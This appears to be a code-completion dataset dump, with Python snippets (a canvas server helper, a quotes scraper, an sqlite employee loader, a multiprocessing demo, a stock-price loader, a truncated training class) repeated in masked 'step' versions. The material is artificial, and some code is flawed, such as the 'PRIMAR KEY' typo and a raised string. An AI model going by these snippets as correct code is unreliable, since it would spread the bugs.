By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be
held down while zooming."""
if HAS_JUPYTER:
return create_jupyter_canvas(buttons=buttons)
else:
raise Exception("Jupyter is not installed")
|
normal
|
{
"blob_id": "b11e2837d3ba9c14770b8039186a2175adc41ea1",
"index": 283,
"step-1": "<mask token>\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n",
"step-3": "<mask token>\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n",
"step-4": "from .server import CanvasServer\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None\n\n\ndef http_server(file: str=None, host: str='localhost', port: int=5050\n ) ->CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool=False) ->JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception('Jupyter is not installed')\n",
"step-5": "from .server import CanvasServer\n\ntry:\n from .jupyter import JupyterCanvas, create_jupyter_canvas\n\n HAS_JUPYTER = True\nexcept:\n HAS_JUPYTER = False\n JupyterCanvas = None # type: ignore\n\n\ndef http_server(\n file: str = None, host: str = \"localhost\", port: int = 5050\n) -> CanvasServer:\n \"\"\"Creates a new HTTP server for displaying the network, using WebSockets to\n transmit data. The server will only start once its\n :meth:`~server.CanvasServer.start` method is called. After the server has started,\n the network can be viewed by opening a browser and navigating to the address\n ``http://localhost:5050/`` (change the port as necessary).\n\n :file: (Optional) The path to the HTML file which the server should display,\n relative to the current runtime directory. If unspecified, the default HTML file\n will be used. When creating a custom HTML interface, use the default file as a\n guide.\n :type file: str\n\n :port: (Optional) The port on which the server should start, defaulting to to 5050.\n Note that the next port (by default 5051) will also be used to transmit data\n through WebSockets.\n :type port: int\n \"\"\"\n return CanvasServer(file, host, port)\n\n\ndef jupyter_canvas(buttons: bool = False) -> JupyterCanvas:\n \"\"\"Creates a new :class:`~api.Canvas` which will dispatch and receive\n events through a Jupyter widget, and which can be displayed using the IPython\n ``display`` function.\n\n By default, the canvas size is (400, 250), and requires the ``ctrl``/``cmd`` to be\n held down while zooming.\"\"\"\n if HAS_JUPYTER:\n return create_jupyter_canvas(buttons=buttons)\n else:\n raise Exception(\"Jupyter is not installed\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('Quotes.txt', 'w') as ff:
for q in quote:
msg = q.find('span', {'class': 'text'})
print(msg.text)
ff.write(msg.text)
author = q.find('small', {'class': 'author'})
print(author.text)
ff.write('\n')
ff.write(author.text)
print()
ff.write('\n\n')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
res = requests.get('http://quotes.toscrape.com/')
soup = BeautifulSoup(res.text, 'lxml')
quote = soup.find_all('div', {'class': 'quote'})
with open('Quotes.txt', 'w') as ff:
for q in quote:
msg = q.find('span', {'class': 'text'})
print(msg.text)
ff.write(msg.text)
author = q.find('small', {'class': 'author'})
print(author.text)
ff.write('\n')
ff.write(author.text)
print()
ff.write('\n\n')
<|reserved_special_token_1|>
from bs4 import BeautifulSoup
import requests
res = requests.get('http://quotes.toscrape.com/')
soup = BeautifulSoup(res.text, 'lxml')
quote = soup.find_all('div', {'class': 'quote'})
with open('Quotes.txt', 'w') as ff:
for q in quote:
msg = q.find('span', {'class': 'text'})
print(msg.text)
ff.write(msg.text)
author = q.find('small', {'class': 'author'})
print(author.text)
ff.write('\n')
ff.write(author.text)
print()
ff.write('\n\n')
<|reserved_special_token_1|>
from bs4 import BeautifulSoup
import requests
res = requests.get('http://quotes.toscrape.com/')
#print(res.content)
#proper ordered printing
#print(res.text)
#lxml -> parser library
soup = BeautifulSoup(res.text , 'lxml')
#print(soup)
quote = soup.find_all('div',{'class' : 'quote'})
with open('Quotes.txt','w') as ff:
for q in quote:
msg = q.find('span',{'class' : 'text'})
print(msg.text)
ff.write(msg.text)
author = q.find('small',{'class' : 'author'})
print(author.text)
ff.write("\n")
ff.write(author.text)
print()
ff.write("\n\n")
|
flexible
|
{
"blob_id": "777c08876a2de803fc95de937d9e921044545ef8",
"index": 3674,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('Quotes.txt', 'w') as ff:\n for q in quote:\n msg = q.find('span', {'class': 'text'})\n print(msg.text)\n ff.write(msg.text)\n author = q.find('small', {'class': 'author'})\n print(author.text)\n ff.write('\\n')\n ff.write(author.text)\n print()\n ff.write('\\n\\n')\n",
"step-3": "<mask token>\nres = requests.get('http://quotes.toscrape.com/')\nsoup = BeautifulSoup(res.text, 'lxml')\nquote = soup.find_all('div', {'class': 'quote'})\nwith open('Quotes.txt', 'w') as ff:\n for q in quote:\n msg = q.find('span', {'class': 'text'})\n print(msg.text)\n ff.write(msg.text)\n author = q.find('small', {'class': 'author'})\n print(author.text)\n ff.write('\\n')\n ff.write(author.text)\n print()\n ff.write('\\n\\n')\n",
"step-4": "from bs4 import BeautifulSoup\nimport requests\nres = requests.get('http://quotes.toscrape.com/')\nsoup = BeautifulSoup(res.text, 'lxml')\nquote = soup.find_all('div', {'class': 'quote'})\nwith open('Quotes.txt', 'w') as ff:\n for q in quote:\n msg = q.find('span', {'class': 'text'})\n print(msg.text)\n ff.write(msg.text)\n author = q.find('small', {'class': 'author'})\n print(author.text)\n ff.write('\\n')\n ff.write(author.text)\n print()\n ff.write('\\n\\n')\n",
"step-5": "from bs4 import BeautifulSoup\r\nimport requests\r\n\r\nres = requests.get('http://quotes.toscrape.com/')\r\n#print(res.content)\r\n#proper ordered printing\r\n#print(res.text)\r\n#lxml -> parser library\r\nsoup = BeautifulSoup(res.text , 'lxml')\r\n#print(soup)\r\n\r\nquote = soup.find_all('div',{'class' : 'quote'})\r\nwith open('Quotes.txt','w') as ff:\r\n for q in quote:\r\n msg = q.find('span',{'class' : 'text'})\r\n print(msg.text)\r\n ff.write(msg.text)\r\n author = q.find('small',{'class' : 'author'})\r\n print(author.text)\r\n ff.write(\"\\n\")\r\n ff.write(author.text)\r\n print()\r\n ff.write(\"\\n\\n\")\r\n\r\n\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
db.execute(
'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'
)
for employee in packages_json['data']:
db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[
'id'], employee['employee_name'], employee['employee_salary'],
employee['employee_age'], employee['profile_image']])
db.commit()
db.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
url = 'http://dummy.restapiexample.com/api/v1/employees'
r = requests.get(url)
packages_json = r.json()
db = sqlite3.connect('employee.sqlite')
db.execute(
'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'
)
for employee in packages_json['data']:
db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[
'id'], employee['employee_name'], employee['employee_salary'],
employee['employee_age'], employee['profile_image']])
db.commit()
db.close()
<|reserved_special_token_1|>
import requests
import sqlite3
url = 'http://dummy.restapiexample.com/api/v1/employees'
r = requests.get(url)
packages_json = r.json()
db = sqlite3.connect('employee.sqlite')
db.execute(
'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'
)
for employee in packages_json['data']:
db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[
'id'], employee['employee_name'], employee['employee_salary'],
employee['employee_age'], employee['profile_image']])
db.commit()
db.close()
<|reserved_special_token_1|>
import requests
import sqlite3
url = 'http://dummy.restapiexample.com/api/v1/employees'
r = requests.get(url)
packages_json = r.json()
# Create the employee database if it does not exist
db = sqlite3.connect('employee.sqlite')
#create the table
db.execute("CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)")
#db.execute("INSERT INTO employee(id, employee_name, employee_salary, employee_age, profile_image) VALUES(1, 'Levi', 50000, 24, '')")
# Loop through each employee information and insert into database
for employee in packages_json['data']:
db.execute("INSERT INTO employee VALUES (?, ?, ?, ?, ?)", [employee["id"], employee["employee_name"], employee["employee_salary"], employee["employee_age"],employee["profile_image"]])
db.commit()
db.close()
|
flexible
|
{
"blob_id": "497203be99643e2bb0087977f292f4ed890f9ead",
"index": 7111,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ndb.execute(\n 'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'\n )\nfor employee in packages_json['data']:\n db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[\n 'id'], employee['employee_name'], employee['employee_salary'],\n employee['employee_age'], employee['profile_image']])\n db.commit()\ndb.close()\n",
"step-3": "<mask token>\nurl = 'http://dummy.restapiexample.com/api/v1/employees'\nr = requests.get(url)\npackages_json = r.json()\ndb = sqlite3.connect('employee.sqlite')\ndb.execute(\n 'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'\n )\nfor employee in packages_json['data']:\n db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[\n 'id'], employee['employee_name'], employee['employee_salary'],\n employee['employee_age'], employee['profile_image']])\n db.commit()\ndb.close()\n",
"step-4": "import requests\nimport sqlite3\nurl = 'http://dummy.restapiexample.com/api/v1/employees'\nr = requests.get(url)\npackages_json = r.json()\ndb = sqlite3.connect('employee.sqlite')\ndb.execute(\n 'CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)'\n )\nfor employee in packages_json['data']:\n db.execute('INSERT INTO employee VALUES (?, ?, ?, ?, ?)', [employee[\n 'id'], employee['employee_name'], employee['employee_salary'],\n employee['employee_age'], employee['profile_image']])\n db.commit()\ndb.close()\n",
"step-5": "import requests\r\nimport sqlite3\r\n\r\nurl = 'http://dummy.restapiexample.com/api/v1/employees'\r\n\r\nr = requests.get(url)\r\npackages_json = r.json()\r\n\r\n# Create the employee database if it does not exist\r\ndb = sqlite3.connect('employee.sqlite')\r\n#create the table\r\ndb.execute(\"CREATE TABLE IF NOT EXISTS employee (id INTEGER PRIMAR KEY, employee_name TEXT, employee_salary INTEGER, employee_age INTEGER, profile_image BLOB)\")\r\n#db.execute(\"INSERT INTO employee(id, employee_name, employee_salary, employee_age, profile_image) VALUES(1, 'Levi', 50000, 24, '')\")\r\n\r\n# Loop through each employee information and insert into database\r\nfor employee in packages_json['data']:\r\n db.execute(\"INSERT INTO employee VALUES (?, ?, ?, ?, ?)\", [employee[\"id\"], employee[\"employee_name\"], employee[\"employee_salary\"], employee[\"employee_age\"],employee[\"profile_image\"]])\r\n db.commit()\r\ndb.close()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def f(q):
for i in range(0, 100):
print('come on baby')
q.put([42, None, 'hello'])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def f(q):
for i in range(0, 100):
print('come on baby')
q.put([42, None, 'hello'])
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=(q,))
p.start()
for j in range(0, 2000):
if j == 1800:
print(q.get())
print(j)
<|reserved_special_token_1|>
from multiprocessing import Process, Queue
def f(q):
for i in range(0, 100):
print('come on baby')
q.put([42, None, 'hello'])
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=(q,))
p.start()
for j in range(0, 2000):
if j == 1800:
print(q.get())
print(j)
<|reserved_special_token_1|>
from multiprocessing import Process, Queue
def f(q):
for i in range(0,100):
print("come on baby")
q.put([42, None, 'hello'])
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=(q,))
p.start()
for j in range(0, 2000):
if j == 1800:
print(q.get())
print(j)
# 특징 main process 와 subprocess 가 각각 실행되다가 1800 에서 subprocess 가 실행될때까지 기다려줌
# 0
# 1
# 2
# 3
# 4
# 5
# 6
# 7
# 8
# 9
# 10
# 11
# 12
# 13
# 14
# 15
# 16
# 17
# ...
# ...
# 1276
# 1277
# 1278
# 1279
# 1280
# 1281
# 1282
# 1283
# 1284
# 1285
# 1286
# 1287
# 1288
# 1289
# 1290
# 1291
# 1292
# 1293
# 1294
# 1295
# come on baby
# 1296
# come on baby
# 1297
# come on baby
# 1298
# come on baby
# 1299
# come on baby
# 1300
# come on baby
# 1301
# come on baby
# 1302
# come on baby
# 1303
# 1304
# come on baby
# 1305
# come on baby
# 1306
# come on baby
# 1307
# come on baby
# 1308
# come on baby
# 1309
# come on baby
# 1310
# come on baby
# 1311
# come on baby
# 1312
# come on baby
# 1313
# come on baby
# 1314
# come on baby
# 1315
# come on baby
# 1316
# come on baby
# 1317
# come on baby
# 1318
# come on baby
# 1319
# come on baby
# 1320
# come on baby
# 1321
# come on baby
# 1322
# come on baby
# 1323
# come on baby
# 1324
# come on baby
# 1325
# come on baby
# 1326
# come on baby
# 1327
# come on baby
# 1328
# come on baby
# 1329
# come on baby
# 1330
# come on baby
# 1331
# come on baby
# 1332
# come on baby
# 1333
# come on baby
# 1334
# come on baby
# 1335
# come on baby
# 1336
# come on baby
# 1337
# come on baby
# 1338
# come on baby
# 1339
# come on baby
# 1340
# come on baby
# 1341
# come on baby
# 1342
# come on baby
# 1343
# come on baby
# 1344
# come on baby
# 1345
# come on baby
# 1346
# come on baby
# 1347
# come on baby
# 1348
# come on baby
# 1349
# come on baby
# 1350
# come on baby
# 1351
# come on baby
# 1352
# come on baby
# 1353
# come on baby
# 1354
# come on baby
# 1355
# come on baby
# 1356
# come on baby
# 1357
# come on baby
# 1358
# come on baby
# 1359
# come on baby
# 1360
# come on baby
# 1361
# come on baby
# 1362
# come on baby
# 1363
# come on baby
# 1364
# come on baby
# 1365
# come on baby
# 1366
# come on baby
# 1367
# come on baby
# 1368
# come on baby
# 1369
# come on baby
# 1370
# come on baby
# 1371
# come on baby
# 1372
# come on baby
# 1373
# come on baby
# 1374
# come on baby
# 1375
# come on baby
# 1376
# come on baby
# 1377
# come on baby
# 1378
# come on baby
# 1379
# come on baby
# 1380
# come on baby
# 1381
# come on baby
# 1382
# come on baby
# 1383
# come on baby
# 1384
# come on baby
# 1385
# come on baby
# 1386
# come on baby
# 1387
# come on baby
# 1388
# come on baby
# 1389
# come on baby
# 1390
# come on baby
# 1391
# come on baby
# 1392
# come on baby
# 1393
# come on baby
# 1394
# come on baby
# 1395
# come on baby
# 1396
# 1397
# 1398
# 1399
# 1400
# 1401
# 1402
# 1403
# 1404
# 1405
# ...
# ...
# 1786
# 1787
# 1788
# 1789
# 1790
# 1791
# 1792
# 1793
# 1794
# 1795
# 1796
# 1797
# 1798
# 1799
# [42, None, 'hello']
# 1800
# 1801
# 1802
# 1803
# 1804
# 1805
# 1806
# 1807
# 1808
# 1809
# ...
# ...
# 1989
# 1990
# 1991
# 1992
# 1993
# 1994
# 1995
# 1996
# 1997
# 1998
# 1999
|
flexible
|
{
"blob_id": "c7258d77db2fe6e1470c972ddd94b2ed02f48003",
"index": 3390,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef f(q):\n for i in range(0, 100):\n print('come on baby')\n q.put([42, None, 'hello'])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef f(q):\n for i in range(0, 100):\n print('come on baby')\n q.put([42, None, 'hello'])\n\n\nif __name__ == '__main__':\n q = Queue()\n p = Process(target=f, args=(q,))\n p.start()\n for j in range(0, 2000):\n if j == 1800:\n print(q.get())\n print(j)\n",
"step-4": "from multiprocessing import Process, Queue\n\n\ndef f(q):\n for i in range(0, 100):\n print('come on baby')\n q.put([42, None, 'hello'])\n\n\nif __name__ == '__main__':\n q = Queue()\n p = Process(target=f, args=(q,))\n p.start()\n for j in range(0, 2000):\n if j == 1800:\n print(q.get())\n print(j)\n",
"step-5": "from multiprocessing import Process, Queue\n\ndef f(q):\n for i in range(0,100):\n print(\"come on baby\")\n q.put([42, None, 'hello'])\n\n\nif __name__ == '__main__':\n q = Queue()\n p = Process(target=f, args=(q,))\n p.start()\n for j in range(0, 2000):\n if j == 1800:\n print(q.get())\n print(j)\n\n\n# 특징 main process 와 subprocess 가 각각 실행되다가 1800 에서 subprocess 가 실행될때까지 기다려줌\n\n# 0\n# 1\n# 2\n# 3\n# 4\n# 5\n# 6\n# 7\n# 8\n# 9\n# 10\n# 11\n# 12\n# 13\n# 14\n# 15\n# 16\n# 17\n\n\n# ...\n# ...\n\n\n# 1276\n# 1277\n# 1278\n# 1279\n# 1280\n# 1281\n# 1282\n# 1283\n# 1284\n# 1285\n# 1286\n# 1287\n# 1288\n# 1289\n# 1290\n# 1291\n# 1292\n# 1293\n# 1294\n# 1295\n# come on baby\n# 1296\n# come on baby\n# 1297\n# come on baby\n# 1298\n# come on baby\n# 1299\n# come on baby\n# 1300\n# come on baby\n# 1301\n# come on baby\n# 1302\n# come on baby\n# 1303\n# 1304\n# come on baby\n# 1305\n# come on baby\n# 1306\n# come on baby\n# 1307\n# come on baby\n# 1308\n# come on baby\n# 1309\n# come on baby\n# 1310\n# come on baby\n# 1311\n# come on baby\n# 1312\n# come on baby\n# 1313\n# come on baby\n# 1314\n# come on baby\n# 1315\n# come on baby\n# 1316\n# come on baby\n# 1317\n# come on baby\n# 1318\n# come on baby\n# 1319\n# come on baby\n# 1320\n# come on baby\n# 1321\n# come on baby\n# 1322\n# come on baby\n# 1323\n# come on baby\n# 1324\n# come on baby\n# 1325\n# come on baby\n# 1326\n# come on baby\n# 1327\n# come on baby\n# 1328\n# come on baby\n# 1329\n# come on baby\n# 1330\n# come on baby\n# 1331\n# come on baby\n# 1332\n# come on baby\n# 1333\n# come on baby\n# 1334\n# come on baby\n# 1335\n# come on baby\n# 1336\n# come on baby\n# 1337\n# come on baby\n# 1338\n# come on baby\n# 1339\n# come on baby\n# 1340\n# come on baby\n# 1341\n# come on baby\n# 1342\n# come on baby\n# 1343\n# come on baby\n# 1344\n# come on baby\n# 1345\n# come on baby\n# 1346\n# come on baby\n# 1347\n# come on baby\n# 1348\n# come on baby\n# 1349\n# come on baby\n# 1350\n# come on baby\n# 1351\n# come on baby\n# 1352\n# come on baby\n# 1353\n# come on baby\n# 1354\n# come on baby\n# 1355\n# come on baby\n# 1356\n# come on baby\n# 1357\n# come on baby\n# 1358\n# come on baby\n# 1359\n# come on baby\n# 1360\n# come on baby\n# 1361\n# come on baby\n# 1362\n# come on baby\n# 1363\n# come on baby\n# 1364\n# come on baby\n# 1365\n# come on baby\n# 1366\n# come on baby\n# 1367\n# come on baby\n# 1368\n# come on baby\n# 1369\n# come on baby\n# 1370\n# come on baby\n# 1371\n# come on baby\n# 1372\n# come on baby\n# 1373\n# come on baby\n# 1374\n# come on baby\n# 1375\n# come on baby\n# 1376\n# come on baby\n# 1377\n# come on baby\n# 1378\n# come on baby\n# 1379\n# come on baby\n# 1380\n# come on baby\n# 1381\n# come on baby\n# 1382\n# come on baby\n# 1383\n# come on baby\n# 1384\n# come on baby\n# 1385\n# come on baby\n# 1386\n# come on baby\n# 1387\n# come on baby\n# 1388\n# come on baby\n# 1389\n# come on baby\n# 1390\n# come on baby\n# 1391\n# come on baby\n# 1392\n# come on baby\n# 1393\n# come on baby\n# 1394\n# come on baby\n# 1395\n# come on baby\n# 1396\n# 1397\n# 1398\n# 1399\n# 1400\n# 1401\n# 1402\n# 1403\n# 1404\n# 1405\n\n\n# ...\n# ...\n\n\n# 1786\n# 1787\n# 1788\n# 1789\n# 1790\n# 1791\n# 1792\n# 1793\n# 1794\n# 1795\n# 1796\n# 1797\n# 1798\n# 1799\n# [42, None, 'hello']\n# 1800\n# 1801\n# 1802\n# 1803\n# 1804\n# 1805\n# 1806\n# 1807\n# 1808\n# 1809\n\n\n# ...\n# ...\n\n\n# 1989\n# 1990\n# 1991\n# 1992\n# 1993\n# 1994\n# 1995\n# 1996\n# 1997\n# 1998\n# 1999\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import stockquote
import time
import datetime
from datetime import date
from connection import db
start_date='20100101'
def prices(symbol):
"""
Loads the prices from the start date for the given symbol
Only new quotes are downloaded.
"""
to = date.today().strftime("%Y%m%d")
c = db.cursor()
c.execute("SELECT DATE_ADD(max(date), INTERVAL 1 DAY) FROM quote where symbol = %s",
(symbol))
(_from, ) = c.fetchone()
if _from == date.today():
print "Skipping %s" % symbol
return
print "Downloading %s" % symbol
if _from is None:
_from = start_date
else:
_from = _from.strftime("%Y%m%d")
prices = stockquote.get_historical_prices(symbol, _from, to)
headers = prices[0]
try:
close = get_idx(headers, 'Close')
date_ = get_idx(headers, 'Date')
open = get_idx(headers, 'Open')
high = get_idx(headers, 'High')
low = get_idx(headers, 'Low')
quotes = prices[1:]
for l in quotes:
#print "%s %s" % (l[date_], l[close])
try:
insert(symbol, l[date_], l[close], l[high], l[low], l[open])
except Exception, e:
print "Could not insert %s:%s" % (symbol, e)
print "Inserted %s new quotes for %s" % (len(quotes), symbol)
except Exception, e:
print "Could not download %s" % symbol
print e
def get_idx(headers, query):
for index, item in enumerate(headers):
if (item == query):
return index
#print("Could not find requested header [%s]" % query)
#print("Available ones are %s" % headers)
raise "Eror ind downloading quote"
def insert(symbol, date, close, high, low, open):
c = db.cursor()
c.execute("INSERT INTO quote (date, symbol, close, high, low, open) VALUES (%s, %s, %s, %s, %s, %s)",
(date, symbol, close, high, low, open))
|
normal
|
{
"blob_id": "1b58d294f02ce85bf19da03f94100af87408081d",
"index": 1326,
"step-1": "import stockquote\nimport time\nimport datetime\nfrom datetime import date\nfrom connection import db\n\nstart_date='20100101'\ndef prices(symbol):\n \"\"\"\n Loads the prices from the start date for the given symbol\n Only new quotes are downloaded.\n \"\"\"\n to = date.today().strftime(\"%Y%m%d\")\n c = db.cursor()\n c.execute(\"SELECT DATE_ADD(max(date), INTERVAL 1 DAY) FROM quote where symbol = %s\",\n (symbol))\n (_from, ) = c.fetchone()\n if _from == date.today():\n print \"Skipping %s\" % symbol\n return\n print \"Downloading %s\" % symbol\n if _from is None: \n _from = start_date\n else:\n _from = _from.strftime(\"%Y%m%d\")\n prices = stockquote.get_historical_prices(symbol, _from, to)\n headers = prices[0]\n try:\n close = get_idx(headers, 'Close')\n date_ = get_idx(headers, 'Date')\n open = get_idx(headers, 'Open')\n high = get_idx(headers, 'High')\n low = get_idx(headers, 'Low')\n quotes = prices[1:]\n for l in quotes:\n #print \"%s %s\" % (l[date_], l[close])\n try:\n insert(symbol, l[date_], l[close], l[high], l[low], l[open])\n except Exception, e:\n print \"Could not insert %s:%s\" % (symbol, e)\n print \"Inserted %s new quotes for %s\" % (len(quotes), symbol)\n except Exception, e:\n print \"Could not download %s\" % symbol\n print e\n\ndef get_idx(headers, query):\n for index, item in enumerate(headers):\n if (item == query):\n return index\n #print(\"Could not find requested header [%s]\" % query)\n #print(\"Available ones are %s\" % headers)\n raise \"Eror ind downloading quote\"\n\ndef insert(symbol, date, close, high, low, open):\n c = db.cursor()\n c.execute(\"INSERT INTO quote (date, symbol, close, high, low, open) VALUES (%s, %s, %s, %s, %s, %s)\",\n (date, symbol, close, high, low, open))\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Trainer(object):
<|reserved_special_token_0|>
def __init__(self, data_loader, model_name, model, optimizer_fn,
final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path
=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',
use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,
pyprof_enabled=False, detect_anomaly=False, seed=None):
self.data_loader = data_loader
self.model_name = model_name
self.model = model
self.n_epochs = n_epochs
self.save_steps = save_steps
self.log_steps = log_steps
self.ckpt_path = ckpt_path
self.log_path = log_path
self.final_steps = final_steps
self.step = step
self.device = device
self.use_amp = use_amp
self.nvprof_iter_start = nvprof_iter_start
self.nvprof_iter_end = nvprof_iter_end
self.pyprof_enabled = pyprof_enabled
self.detect_anomaly = detect_anomaly
self.model.train()
to_device_async(self.model, self.device)
num_param = sum(param.numel() for param in model.parameters())
tprint('The number of {} parameters: {}'.format(self.model_name,
num_param))
self.optimizer = optimizer_fn(model)
if lr_scheduler_fn:
self.lr_scheduler = lr_scheduler_fn(self.optimizer)
else:
self.lr_scheduler = None
if self.use_amp:
from apex import amp
self.model, self.optimizer = amp.initialize(self.model, self.
optimizer, opt_level='O1')
if (nvprof_iter_start and nvprof_iter_end is not None and
pyprof_enabled):
from apex import pyprof
pyprof.nvtx.init()
self.model = nn.DataParallel(self.model)
if seed is None:
seed = np.random.randint(2 ** 16)
np.random.seed(seed)
torch.manual_seed(seed)
self.data_loader_iter = self.repeat(self.data_loader, n_epochs)
if log_path:
log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))
self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)
if self.ckpt_path:
self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)
pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)
self.load()
<|reserved_special_token_0|>
@abc.abstractmethod
def loss(self, inputs, model):
raise NotImplemented
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def save(self):
